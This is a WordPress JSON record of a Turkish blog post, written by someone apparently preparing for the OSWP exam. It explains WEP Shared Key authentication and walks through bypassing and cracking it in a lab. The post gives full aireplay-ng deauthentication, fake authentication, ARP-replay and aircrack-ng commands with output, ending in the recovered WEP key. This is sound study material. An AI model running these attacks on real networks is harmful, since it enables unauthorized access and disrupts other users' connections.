{"id":1080,"date":"2021-05-12T15:13:50","date_gmt":"2021-05-12T15:13:50","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1080"},"modified":"2021-05-12T15:13:50","modified_gmt":"2021-05-12T15:13:50","slug":"shared-key-nedir","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/05\/12\/shared-key-nedir\/","title":{"rendered":"Shared Key Nedir?"},"content":{"rendered":"<p>OSWP s\u0131nav\u0131na haz\u0131rlan\u0131rken hi\u00e7 bilmeyenler i\u00e7in kaynak \u00fcretmeye \u00e7al\u0131\u015f\u0131yorum bazen konular\u0131 fazla h\u0131zl\u0131 anlat\u0131yorum ya da anlatm\u0131yorum \u00e7\u00fcnk\u00fc eskimi\u015f teknolojiler oluyor. Mesela shared key gibi... Vaktim vard\u0131 bir ka\u00e7 g\u00fcnede s\u0131nava girece\u011fim yazayim dedim...<\/p>\n<p>Open Authentication'u biliyoruz. Ad\u0131n\u0131n hakk\u0131n\u0131 veriyor \u00e7\u00fcnk\u00fc ger\u00e7ekten hi\u00e7 bir do\u011frulama mekanizmas\u0131 olmadan AP ile ileti\u015fime ge\u00e7ebilecek duruma geliyoruz. Buda bize WEP ve Open authentication ile konfig\u00fcre edilmi\u015f bir network'te kolayca paket injection yapabilme f\u0131rsat\u0131 veriyor.<br \/>\nShared Key, hikayenin tam da bu k\u0131sm\u0131nda devreye girmektedir. Sizi AP ile konu\u015fturmadan \u00f6nce do\u011frulamaya \u00e7al\u0131\u015f\u0131r. Size bir challange request g\u00f6nderir sizde bu geen bu request'teki veriyi do\u011fru key ile \u015fifreleyip cevap d\u00f6nersiniz. E\u011fer AP bunu do\u011frularsa sizinle konu\u015fmaya ba\u015flar. \u00c7ok g\u00fczel g\u00f6r\u00fcn\u00fcyor de\u011fil mi? Ama yine \u00e7ok kolay bir \u015fekilde bypass edebiliriz.<\/p>\n<p>Shared Key ile konfig\u00fcre edilmi\u015f bir a\u011fda ilk ba\u015fta fake authetication sald\u0131r\u0131s\u0131 yapmaya deneyelim. A\u015fa\u011f\u0131dakine benzer bir \u00e7\u0131kt\u0131 al\u0131r\u0131z.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# airodump-ng wlan0 --bssid 7A:2B:C1:63:BD:64 -c 1 -w shared\n10:59:10  Created capture file &quot;shared-01.cap&quot;.\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aireplay-ng -1 0 -e Huawei_HG655d -a 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0\n11:00:45  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1\n\n11:00:45  Sending Authentication Request (Open System) [ACK]\n11:00:45  Switching to shared key authentication\n^Cad 25 packets....\n<\/code><\/pre>\n<p>\u015eimdi bir Deauthetication sald\u0131r\u0131s\u0131 yapal\u0131m ve bu esnada airodump-ng ile dinleme i\u015flemi ger\u00e7ekle\u015ftirelim. Network i\u00e7erisindeki bir client tekrar a\u011fa ba\u011fland\u0131\u011f\u0131nda ondan XOR dosyas\u0131n\u0131 elde edece\u011fiz ve bu dosya arac\u0131l\u0131\u011f\u0131 ile challenge reqeste response olu\u015fturabilece\u011fiz.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aireplay-ng -0 10 -a 7A:2B:C1:63:BD:64 wlan0\n11:04:38  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1\nNB: this attack is more effective when targeting\na connected wireless client (-c &lt;client&#039;s mac&gt;).\n11:04:39  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:39  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:40  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:40  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:41  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:41  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:42  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:43  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:43  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:44  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# ls\nshared-01-7A-2B-C1-63-BD-64.xor  shared-01.csv         shared-01.kismet.netxml\nshared-01.cap                    shared-01.kismet.csv  shared-01.log.csv\n<\/code><\/pre>\n<p>Yukar\u0131da g\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere .xor dosyas\u0131 elde edildi. \u015eimdi bu dosya arac\u0131l\u0131\u011f\u0131 ile fake authentication sald\u0131r\u0131s\u0131 yapal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aireplay-ng -1 600 -e Huawei_HG655d  -y shared-01-7A-2B-C1-63-BD-64.xor -a 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0\nThe interface MAC (96:B5:61:AD:E1:1A) doesn&#039;t match the specified MAC (-h).\n    ifconfig wlan0 hw ether 3A:BD:12:90:30:0D\n11:07:15  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1\n\n11:07:15  Sending Authentication Request (Shared Key)\n\n11:07:17  Sending Authentication Request (Shared Key) [ACK]\n11:07:17  Authentication 1\/2 successful\n11:07:17  Sending encrypted challenge. [ACK]\n11:07:17  Authentication 2\/2 successful\n11:07:17  Sending Association Request [ACK]\n11:07:17  Association successful :-) (AID: 1)\n\n...<\/code><\/pre>\n<p>Harika! Art\u0131k s\u0131rada ARP-REPLAY ve aircrak-ng var. Arp-replay yaparken kolayl\u0131k a\u00e7\u0131s\u0131ndan birde deauthentication sald\u0131r\u0131s\u0131 ger\u00e7ekle\u015ftirirsek daha h\u0131zl\u0131 bir \u015fekilde arp paketi yakalayabiliriz.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aireplay-ng -3 -b 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0                                             130 \u2a2f\nThe interface MAC (96:B5:61:AD:E1:1A) doesn&#039;t match the specified MAC (-h).\n    ifconfig wlan0 hw ether 3A:BD:12:90:30:0D\n11:09:10  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1\nSaving ARP requests in replay_arp-0512-110910.cap\nYou should also start airodump-ng to capture replies.\n^Cad 114438 packets (got 37470 ARP requests and 21755 ACKs), sent 33309 packets...(499 pps)\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aireplay-ng -0 10 -a 7A:2B:C1:63:BD:64 wlan0 \n11:09:13  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1\nNB: this attack is more effective when targeting\na connected wireless client (-c &lt;client&#039;s mac&gt;).\n11:09:13  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:14  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:14  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:15  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:15  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:16  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:16  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:17  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:17  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:18  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n CH  1 ][ Elapsed: 6 mins ][ 2021-05-12 11:11 ][ interface wlan0 down \n\n BSSID              PWR RXQ  Beacons    #Data, #\/s  CH   MB   ENC CIPHER  AUTH ESSID\n\n 7A:2B:C1:63:BD:64  -38 100     3424    22693    0   1   54e. WEP  WEP    SKA  Huawei_HG655d                        \n\n BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes\n\n 7A:2B:C1:63:BD:64  18:28:61:28:F8:70  -18   54e-54e     0    13447                                                  \n 7A:2B:C1:63:BD:64  3A:BD:12:90:30:0D  -38    0 - 1      0    65725                                                  \nQuitting...\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aircrack-ng shared-01.cap                                 \nReading packets, please wait...\nOpening shared-01.cap\nRead 188762 packets.\n                                            Got 22697 out of 20000 IVsStarting PTW attack with 22697 ivs.\n   #  BSSID              ESSID                     Encryption\n\n   1  7A:2B:C1:63:BD:64  Huawei_HG655d             WEP (22697 IVs)\n\nChoosing first network as target.\n\nReading packets, please wait...\nOpening shared-01.cap\nRead 188762 packets.\n\n1 potential targets\n\nAttack will be restarted every 5000 captured ivs.\n\n                                                 Aircrack-ng 1.6 \n\n                                   [00:00:01] Tested 71432 keys (got 22393 IVs)\n\n   KB    depth   byte(vote)\n    0    0\/  1   00(36352) C8(28928) E3(27904) BA(27648) 0A(27392) B8(27392) 61(26880) 8D(26880) \n    1   14\/ 16   D9(26368) 00(26112) 16(26112) 9F(26112) FC(26112) 30(25856) 48(25856) 79(25856) \n    2    0\/  2   00(32768) FB(28416) 56(28160) 97(27904) B2(27904) F6(27904) 81(27648) 20(27392) \n    3    2\/ 58   00(28160) D2(28160) CA(27904) 19(27904) 01(27648) 3A(27392) 4A(27392) 56(27392) \n    4    8\/ 41   00(26880) 04(26624) 1E(26624) CF(26368) FA(26112) 69(26112) 85(26112) C8(26112) \n\n                     KEY FOUND! [ 00:00:00:00:00 ] (ASCII: ..... )\n    Decrypted correctly: 100%\n<\/code><\/pre>\n<p>A\u011f\u0131n parolas\u0131:0000000000'mu\u015f...<\/p>\n","protected":false},"excerpt":{"rendered":"<p>OSWP s\u0131nav\u0131na haz\u0131rlan\u0131rken hi\u00e7 bilmeyenler i\u00e7in kaynak \u00fcretmeye \u00e7al\u0131\u015f\u0131yorum bazen konular\u0131 fazla h\u0131zl\u0131 anlat\u0131yorum ya da anlatm\u0131yorum \u00e7\u00fcnk\u00fc eskimi\u015f teknolojiler oluyor. Mesela shared key gibi&#8230;&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/05\/12\/shared-key-nedir\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Shared Key Nedir?<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[382],"tags":[496],"class_list":["post-1080","post","type-post","status-publish","format-standard","hentry","category-wireless","tag-shared-key","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1080","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1080"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1080\/revisions"}],"predecessor-version":[{"id":1081,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1080\/revisions\/1081"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1080"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1080"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1080"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}